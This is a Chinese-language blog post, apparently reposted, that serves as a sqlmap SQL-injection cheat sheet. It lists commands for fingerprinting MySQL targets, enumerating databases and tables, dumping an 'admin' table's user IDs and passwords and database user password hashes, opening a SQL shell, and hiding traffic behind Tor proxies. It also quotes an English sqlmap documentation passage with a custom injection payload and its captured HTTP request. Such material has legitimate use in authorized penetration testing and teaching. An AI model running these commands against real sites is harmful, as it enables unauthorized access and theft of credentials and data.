sqlmap mysql案例_sqlmap简单mysql注入演示附截图
安裝教程百度一下就有了.
首先下載需要的文件,如果是windows環境直接到
看大牛的視頻,學習一下,附上截圖....算是轉載吧...只是為了分享一下..
下邊是實例:
sqlmap.py -update 更新
-h help
sqlmap.py -u --dbms "Mysql" --current-user
/* 注解:獲取當前用戶名稱
current user: ’root@localhost’
sqlmap.py -u --dbms "Mysql" --current-db
/*當前數據庫
current database: ’wepost’
sqlmap.py -u --dbms "Mysql" --tables -D "wepost"
sqlmap.py -u --dbms "Mysql" --columns
-T "admin" -D "wepost"
sqlmap.py -u --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*獲取字段里面的內容
?
sqlmap簡單中文說明
更新
svn checkout sqlmap-dev
sqlmap.py -u "" -v 1 --sql-shell //執行SQL語句
sqlmap.py -u "" -v 5 //更詳細的信息
load options from a configuration INI file
sqlmap -c sqlmap.conf
使用POST方法提交
sqlmap.py -u "" --method POST --data "id=1"
使用COOKIES方式提交,cookie的值用;分割,可以使用TamperData來抓cookies
python sqlmap.py -u "" --cookie "id=1" -v 1
使用referer欺騙
python sqlmap.py -u "" --referer "" -v 3
使用自定義user-agent,或者使用隨機使用自帶的user-agents.txt
python sqlmap.py -u "" --user-agent "Mozilla/4.0 compatible; MSIE 7.0; Windows NT 5.1" -v 3
python sqlmap.py -u "" -v 1 -a "./txt/user-agents.txt"
使用基本認證
python sqlmap.py -u "" --auth-type Basic --auth-cred "" -v 3
使用Digest認證
python sqlmap.py -u "" --auth-type Digest --auth-cred "" -v 3
使用代理,配合TOR
python sqlmap.py -u "" --proxy ""
python sqlmap.py -u "" --proxy ""
使用多線程猜解
python sqlmap.py -u "" -v 1 --current-user --threads 3
繞過動態檢測,直接指定有注入點的參數,可以使用,分割多個參數,指定user-agent注入
python sqlmap.py -u "" -v 1 -p "id
python sqlmap.py -u "" -v 1 -p "cat,id"
python sqlmap.py -u "" -v 1 -p "user-agent" --user-agent "sqlmap/0.7rc1 "
指定數據庫,繞過SQLMAP的自動檢測
python sqlmap.py -u "" -v 2 --dbms "PostgreSQL"
* MySQL
* Oracle
* PostgreSQL
* Microsoft SQL Server
指定操作系統,繞過SQLMAP自動檢測
python sqlmap.py -u "" -v 2 --os "Windows"
* Linux
* Windows
自定義payload
Options: --prefix and --postfix
In some circumstances the vulnerable parameter is exploitable only if the user provides a postfix to be appended to the injection payload. Another scenario where these options come handy presents itself when the user already knows that query syntax and want to detect and exploit the SQL injection by directly providing a injection payload prefix and/or postfix.
Example on a MySQL 5.0.67 target on a page where the SQL query is: $query = "SELECT * FROM users WHERE id=’" . $_GET[’id’] . "’ LIMIT 0, 1";:
$ python sqlmap.py -u "" -v 3 -p "id" --prefix "’" --postfix "AND ’test’=’test"
[...]
[] [INFO] testing sql injection on GET parameter ’id’ with 0 parenthesis
[] [INFO] testing custom injection on GET parameter ’id’
[] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20
%28%27test%27=%27test HTTP/1.1
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 192.168.1.121:80
Accept-language: en-us,en;q=0.5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
image/png,*/*;q=0.5
User-agent: sqlmap/0.7rc1
Connection: close
[...]
[] [INFO] GET parameter ’id’ is custom injectable
[...]
As you can see, the injection payload for testing for custom injection is:
id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test
which URL decoded is:
id=1’ AND 7433=7433 AND ’test’=’test
and makes the query syntatically correct to the page query:
SELECT * FROM users WHERE id=’1’ AND 7433=7433 AND ’test’=’test’ LIMIT 0, 1
In this simple example, sqlmap could detect the SQL injection and exploit it without need to provide a custom injection payload, but sometimes in the real world application it is necessary to provide it.
頁面比較
python sqlmap.py -u "" --string "luther" -v 1
python sqlmap.py -u "" --regexp "
lu[/w][/w]er" -v排除網站的內容
python sqlmap.py -u "" --excl-reg "Dynamic content: [/d]+"
多語句測試,php內嵌函數mysql_query,不支持多語句
python sqlmap.py -u "" --stacked-test -v 1
union注入測試
python sqlmap.py -u "" --union-test -v 1
unionz注入配合orderby
python sqlmap.py -u "" --union-test --union-tech orderby -v 1
python sqlmap.py -u "" -v 1 --union-use --banner
python sqlmap.py -u "" -v 5 --union-use --current-user
python sqlmap.py -u "" -v 1 --union-use --dbs
fingerprint
python sqlmap.py -u "" -v 1 -f
python sqlmap.py -u "" -v 1 -f -b
判斷當前用戶是否是dba
python sqlmap.py -u "" --is-dba -v 1
列舉數據庫用戶
python sqlmap.py -u "" --users -v 0
列舉數據庫用戶密碼
python sqlmap.py -u "" --passwords -v 0
python sqlmap.py -u "" --passwords -U sa -v 0
查看用戶權限
python sqlmap.py -u "" --privileges -v 0
python sqlmap.py -u "" --privileges -U postgres -v 0
列數據庫
python sqlmap.py -u "" --dbs -v 0
列出指定數據庫指定表的列名
python sqlmap.py -u "" --columns -T users -D test -v 1
列出指定數據庫的指定表的指定列的內容
python sqlmap.py -u "" --dump -T users -D master -C surname -v 0
指定列的范圍從2-4
python sqlmap.py -u "" --dump -T users -D test --start 2 --stop 4 -v 0
導出所有數據庫,所有表的內容
python sqlmap.py -u "" --dump-all -v 0
只列出用戶自己新建的數據庫和表的內容
python sqlmap.py -u "" --dump-all --exclude-sysdbs -v 0
sql query
python sqlmap.py -u "" --sql-query "SELECT usename FROM pg_user" -v 0
python sqlmap.py -u "" --sql-query "SELECT host, password FROM mysql.user LIMIT 1, 3" -v 1
SELECT usename, passwd FROM pg_shadow ORDER BY usename
保存和恢復會話
python sqlmap.py -u "" -b -v 1 -s "sqlmap.log"
保存選項到INC配置文件
python sqlmap.py -u "" -b -v 1 --save
總結
以上是生活随笔為你收集整理的sqlmap mysql案例_sqlmap简单mysql注入演示附截图的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: mysql 5.7.22 winx64_
- 下一篇: php mysql 查询 区分大小写_M